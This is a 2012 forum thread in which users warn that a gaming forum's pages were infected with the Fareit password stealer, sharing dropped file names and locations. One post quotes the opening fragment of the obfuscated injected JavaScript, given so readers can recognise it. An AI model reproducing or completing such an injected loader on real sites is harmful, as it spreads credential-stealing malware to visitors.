Page 1 of 2
WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 01 Feb 2012, 12:10
by basys
WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Keep off the Horizon/Playsim forum ATM
Their forum is infected YET AGAIN !!!
Virus is a password stealer - Win32 Fareit.A
Drops a video and icon into c:\windows\syswow64\
video is a GUIDname.avi begining with 78ec91b
Also drops an exe into C:\Program Data\
filename isecurity.exe
and matching icon onto the desktop.
May be other aspects.
HTH
ATB
Paul
Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 01 Feb 2012, 22:40
by GHD
No problem here
Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 01 Feb 2012, 22:56
by basys
Hi Folks
George -
As of 22:43 tonight the javascript is still present.
Take a look at the index.php's page source,
its right at the very top,
and outside the html tags.
Your a/v may have automatically quarantined it,
or, hopefully not,
failed to detect it at all.
MS-SE, AVG, Ad-Aware, Sucuri all detect the script.
From what I can see -
If you've got javascript turned off
or java is not installed,
then you shouldn't have an issue.
Yes I do know they are totally unrelated.
But from what I've come across
that javascript supposedly decodes to install a java runtime.
HTH
ATB
Paul
Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 02 Feb 2012, 00:13
by GHD
I do have Java installed and MalwareBytes reports no problem.
Rememember, this virus was discovered in May last year so most ant-virus systems would know of it.
AVG shows no attemped infection.
Also, I have no reg entries in HKCU\Software\WinRAR
Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 02 Feb 2012, 00:24
by TSR2
I'm not seeing anything either Paul
Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 02 Feb 2012, 11:57
by basys
Hi Folks
Gents
What are you saying ?
a ) Your antivirus is giving you no warning ?
b ) You can't see the script ?
c ) Both above ?
Please look at the page source for -
http://www.playhorizon.co.uk/forums/index.php
Here's a snippet from the start of the code,
freshly grabbed at 11:01 02/02/2012
Code: Select all
<script>if(window.document)aa=(Number+[].unshift).substr(0,4);aaa=([].sort+[].sort).substr(0,4);
HTH
ATB
Paul
Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 02 Feb 2012, 12:06
by 511Flyer
AVG blocked my access yesterday. Today, I can't log on to the site. Blank screen. Tried using the link Paul posted. Same result.
Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 02 Feb 2012, 12:08
by basys
Hi Folks
Scratch that.
They've finally pulled the whole site.
Please see -
http://www.playhorizon.co.uk/
That's an extremely accusatory message.
Just shows how utterly clueless they are.
ATB
Paul
Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 02 Feb 2012, 12:17
by TSR2
Hi Paul,
My AV didn't give a warning. Either way, the text they have put on their page seems neither helpful or particularly informative. It implies they knew there was an issue yesterday and did nothing about it until today which is a poor show.
Re: WARNING - Virus - Horizon/Playsims Forum 01/02/2012
Posted: 02 Feb 2012, 12:24
by basys
Hi Folks
Ben -
Please see thread over at -
earthsimulations forum
HTH
ATB
Paul